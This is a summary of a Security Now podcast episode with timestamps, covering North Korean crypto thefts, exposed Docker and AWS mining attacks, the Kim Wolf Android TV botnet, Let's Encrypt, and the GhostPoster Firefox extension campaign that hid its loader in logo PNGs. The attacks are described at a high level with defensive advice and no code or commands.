Security Now #1057: GhostPoster - Free VPNs, Hidden Risks
Recorded: December 23, 2025 | Hosts: Steve Gibson & Leo Laporte
Episode Overview
Steve Gibson and Leo Laporte close out 2025 with a packed episode focused on the hidden dangers of browser extensions—especially “free” VPN add-ons—and how a new malware campaign dubbed "GhostPoster" infected 50,000 Firefox users via a steganographically-hidden payload in a seemingly harmless image. The show also dives into:
- North Korea's record-breaking cryptocurrency thefts,
- The persistent risk of insecure Docker server deployments,
- Amazon AWS cloud mining attacks,
- The emergence of a colossal Android-based smart TV botnet (Kim Wolf),
- The evolving realities of free certificate infrastructures like Let's Encrypt.
The episode delivers both technical insight and practical security hygiene advice for end-users and professionals.
Key Discussion Points and Insights
1. North Korea’s Rise as a Cybercrime Superpower
[14:18 – 38:15]
- Massive Hauls: North Korean government-backed hackers stole $2 billion in cryptocurrency in 2025—a single-year record, pushing their all-time total to $6.75 billion.
- Tactics Evolved:
- Fewer attacks but much higher payloads per breach.
- Deceptive social engineering: embedding IT workers at targets, phishing as recruiters, and orchestrating elaborate credential-collection schemes.
- Money Laundering Networks:
- Preferred laundering through Chinese-language mixing services, bridging protocols, and fragmentation across blockchains.
- Individual Wallet Attacks:
- 158,000 wallet compromises affecting 80,000 victims in 2025, although the total value stolen from individuals dropped compared to 2024.
- Key Quote:
“We have a hyper-aggressive, state-backed hacking community that is, I’m sure, where speaking English with as little accent as possible is highly valued, doing everything they can think of... to separate us from that income.” – Steve Gibson [29:40] - Security Recommendation:
- Move cryptocurrency to offline wallets wherever possible; don’t leave significant funds in online wallets or exchanges.
2. Insecure Cloud and Docker Deployments: Mining the Miners
[40:09 – 55:38]
- AWS Campaigns:
- Attackers obtained leaked AWS credentials and quickly deployed crypto miners via EC2 and ECS cloud services.
- They evaded detection by using “disable API termination” on instances—a persistence trick that thwarts remediation until the flag is reset.
- Malicious Docker Images:
- Docker Hub image with SRBMiner-MULTI (a legitimate multi-algo mining utility) compromised thousands of machines.
- Attackers exploited open Docker Remote API servers; Docker clearly warns to never expose these without proper security.
- The Golden Rule:
“Never rely upon the strength of remote authentication. Period.” – Steve Gibson [54:31] - User Advice:
- Don’t expose Docker APIs publicly; isolate them behind VPN/firewalls.
- Never trust default or remote authentication for critical services.
3. Kim Wolf — The Smart TV Super-Botnet
[63:47 – 89:47]
- Discovery:
- Researchers found a global botnet (Kim Wolf) with at least 1.8 million Android TV devices infected, potentially capable of 30 terabits per second of DDoS.
- Capabilities:
- Beyond typical DDoS: includes proxy forwarding, remote shell, and file management.
- Utilizes DNS over TLS, elliptic curve digital signatures, and ens (Ethereum Name Service) for resilient C2 infrastructure.
- Infection Demographics:
- Most infected devices: Brazil (14.6%), India (12.7%), USA (9.6%).
- Warning:
- Cheap or off-brand Android TV boxes are highly susceptible due to lack of firmware updates and security by design.
- Key Quote:
“Attackers can use controlled terminals to insert tampered, biased or extreme videos... they can insert content without written permission, violating the contract between the viewer and the TV provider and is illegal.” – Steve Gibson reading research [88:35] - Advice:
- Only buy TV boxes from reputable brands, maintain firmware updates, avoid unknown APKs, and use strong, unique device passwords.
4. Let’s Encrypt, Free Certificates, and Centralization
[95:27 – 113:50]
- Free Validation Certificates:
- Let’s Encrypt now supplies about two-thirds of all web certificates; Google also quietly offers free certificates.
- The foundations of free certificate infrastructure are philanthropic: funded by Google, Mozilla, Cisco, Meta, and others.
- Risks and Trust:
- Centralization brings worries—if Let’s Encrypt falters, web trust could be affected, but they have strong backing and are essential for modern web security.
- EV Certificates Are Over:
“There’s no point for having EV certificates, there’s no point for having EV code signing. All of that is drained out of the system.” – Steve Gibson [108:43] - Recommendation:
- For most, domain-validated free certificates are sufficient; donate to Let’s Encrypt as you would to Wikipedia.
5. Main Story: “GhostPoster” — PNG Steganography Powers Massive Firefox Extension Attack
[121:08 – 137:12]
- Discovery:
- KOI security researchers found 17 malicious Firefox extensions (over 50,000 installs), mainly “free VPN” and utility extensions, hiding JavaScript malware in their logo PNGs using steganography.
- How the Attack Works:
- Logo PNG file contains hidden JavaScript after a marker (“===”).
- On load, the extension extracts and executes a loader hidden within the image, which checks in with C2 servers and selectively fetches the actual malware.
- Multi-stage: real payload is delivered randomly (10% chance every 48 hours, after a 6-day delay), exchanged remotely—making forensic detection extremely hard.
- Malware Functions:
- Affiliate commission hijacking (steals e-commerce commissions)
- Browser-wide tracking (injects Google Analytics across pages)
- Strips browser security headers (CSP, X-Frame-Options) exposing users to XSS, clickjacking
- Invisible iframe injection for ad/click fraud
- CAPTCHA bypass via overlays and external solvers
- Extensions List Includes:
- Free VPN Forever, Free MP3 Downloader, Translation tools, Weather, Ad Blockers, Mouse Gestures, etc.
- Key Quote:
“The real threat is simpler: 50,000 users installed extensions that gave attackers full control over their browsers. And these extensions are still live…” – Steve Gibson [136:10], reading KOI report - Advice:
- Only install essential, well-vetted browser extensions.
- Routinely audit and uninstall unused or unfamiliar ones.
- Avoid “Free” VPN/browser tools—assume malicious unless proven otherwise.
Notable Quotes & Moments
- On State-Sponsored Attacks:
“The bad guys want our money. And sadly, today’s security isn’t strong enough to keep them from finding ways to get it.” – Steve Gibson [58:35] - On User Security Hygiene:
“Do everything you can to limit your usage to extensions you really need. Get rid of any you downloaded thinking you’d use but haven’t.” – Steve Gibson [137:06] - On Security Culture:
“The lesson we learn about humanity is, someone who really wants something really bad—who just keeps pushing—often gets it.” – Steve Gibson [138:10]
Timestamps for Important Segments
- Crypto Crime & North Korea: [14:18 – 38:15]
- AWS & Docker Crypto Mining Risks: [40:09 – 55:38]
- Kim Wolf TV Botnet: [63:47 – 89:47]
- Let’s Encrypt & Free Certificates: [95:27 – 113:50]
- Main Story: GhostPoster Attack: [121:08 – 137:12]
Takeaways & Recommendations
- Always treat browser extensions—especially “free” ones—with skepticism.
- Don’t expose infrastructure or admin APIs to internet access without strong containment.
- Move significant cryptocurrency to offline storage.
- Avoid untrusted/cheap Android TV devices, keep firmware updated, use strong passwords.
- If you benefit from free web infrastructure like Let’s Encrypt, consider supporting it financially.
Security Now returns in 2026 with more cutting-edge security insights. Have a safe and secure New Year!